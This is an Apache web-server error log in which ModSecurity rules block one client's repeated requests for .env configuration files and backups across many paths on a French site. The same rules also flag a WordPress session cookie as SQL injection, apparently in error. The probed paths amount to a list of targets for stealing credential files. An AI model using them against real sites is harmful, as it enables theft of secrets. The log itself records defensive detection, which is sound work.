[Mon May 11 14:10:21.271847 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/cron/.env"] [unique_id "agHHLeJEyNRN152ArORzmgAAAFI"]
[Mon May 11 14:10:21.272097 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/cron/.env"] [unique_id "agHHLeJEyNRN152ArORzmgAAAFI"]
[Mon May 11 14:10:21.526399 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/en/.env"] [unique_id "agHHLeJEyNRN152ArORzmwAAAFI"]
[Mon May 11 14:10:21.526791 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/en/.env"] [unique_id "agHHLeJEyNRN152ArORzmwAAAFI"]
[Mon May 11 14:10:21.526974 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/en/.env"] [unique_id "agHHLeJEyNRN152ArORzmwAAAFI"]
[Mon May 11 14:10:21.527215 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/en/.env"] [unique_id "agHHLeJEyNRN152ArORzmwAAAFI"]
[Mon May 11 14:10:21.776922 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/administrator/.env"] [unique_id "agHHLeJEyNRN152ArORznAAAAFI"]
[Mon May 11 14:10:21.777311 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/administrator/.env"] [unique_id "agHHLeJEyNRN152ArORznAAAAFI"]
[Mon May 11 14:10:21.777493 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/administrator/.env"] [unique_id "agHHLeJEyNRN152ArORznAAAAFI"]
[Mon May 11 14:10:21.777730 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/administrator/.env"] [unique_id "agHHLeJEyNRN152ArORznAAAAFI"]
[Mon May 11 14:10:22.091266 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/psnlink/.env"] [unique_id "agHHLuJEyNRN152ArORznQAAAFI"]
[Mon May 11 14:10:22.091633 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/psnlink/.env"] [unique_id "agHHLuJEyNRN152ArORznQAAAFI"]
[Mon May 11 14:10:22.091813 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/psnlink/.env"] [unique_id "agHHLuJEyNRN152ArORznQAAAFI"]
[Mon May 11 14:10:22.092032 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/psnlink/.env"] [unique_id "agHHLuJEyNRN152ArORznQAAAFI"]
[Mon May 11 14:10:22.386588 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/exapi/.env"] [unique_id "agHHLuJEyNRN152ArORzngAAAFI"]
[Mon May 11 14:10:22.386954 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/exapi/.env"] [unique_id "agHHLuJEyNRN152ArORzngAAAFI"]
[Mon May 11 14:10:22.387127 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/exapi/.env"] [unique_id "agHHLuJEyNRN152ArORzngAAAFI"]
[Mon May 11 14:10:22.387367 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/exapi/.env"] [unique_id "agHHLuJEyNRN152ArORzngAAAFI"]
[Mon May 11 14:10:22.690281 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/sitemaps/.env"] [unique_id "agHHLuJEyNRN152ArORznwAAAFI"]
[Mon May 11 14:10:22.690658 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/sitemaps/.env"] [unique_id "agHHLuJEyNRN152ArORznwAAAFI"]
[Mon May 11 14:10:22.690846 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/sitemaps/.env"] [unique_id "agHHLuJEyNRN152ArORznwAAAFI"]
[Mon May 11 14:10:22.691076 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/sitemaps/.env"] [unique_id "agHHLuJEyNRN152ArORznwAAAFI"]
[Mon May 11 14:10:22.819440 2026] [core:error] [pid 1319886:tid 1319916] [client 52.242.216.199:21736] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:22.819467 2026] [core:error] [pid 1319886:tid 1319916] [client 52.242.216.199:21736] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:23.000138 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup1"] [unique_id "agHHLuJEyNRN152ArORzoQAAAFI"]
[Mon May 11 14:10:23.000525 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup1"] [unique_id "agHHLuJEyNRN152ArORzoQAAAFI"]
[Mon May 11 14:10:23.000709 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup1"] [unique_id "agHHLuJEyNRN152ArORzoQAAAFI"]
[Mon May 11 14:10:23.000952 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup1"] [unique_id "agHHLuJEyNRN152ArORzoQAAAFI"]
[Mon May 11 14:10:23.280992 2026] [core:error] [pid 1319886:tid 1319926] [client 52.242.216.199:21746] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:23.281035 2026] [core:error] [pid 1319886:tid 1319926] [client 52.242.216.199:21746] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:23.319872 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup2"] [unique_id "agHHL-JEyNRN152ArORzogAAAFI"]
[Mon May 11 14:10:23.320272 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup2"] [unique_id "agHHL-JEyNRN152ArORzogAAAFI"]
[Mon May 11 14:10:23.320457 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup2"] [unique_id "agHHL-JEyNRN152ArORzogAAAFI"]
[Mon May 11 14:10:23.320695 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup2"] [unique_id "agHHL-JEyNRN152ArORzogAAAFI"]
[Mon May 11 14:10:23.578589 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /logs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/logs/.env"] [unique_id "agHHL-JEyNRN152ArORzowAAAFI"]
[Mon May 11 14:10:23.578981 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/logs/.env"] [unique_id "agHHL-JEyNRN152ArORzowAAAFI"]
[Mon May 11 14:10:23.579182 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/logs/.env"] [unique_id "agHHL-JEyNRN152ArORzowAAAFI"]
[Mon May 11 14:10:23.579465 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/logs/.env"] [unique_id "agHHL-JEyNRN152ArORzowAAAFI"]
[Mon May 11 14:10:23.842812 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cache/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/cache/.env"] [unique_id "agHHL-JEyNRN152ArORzpQAAAFI"]
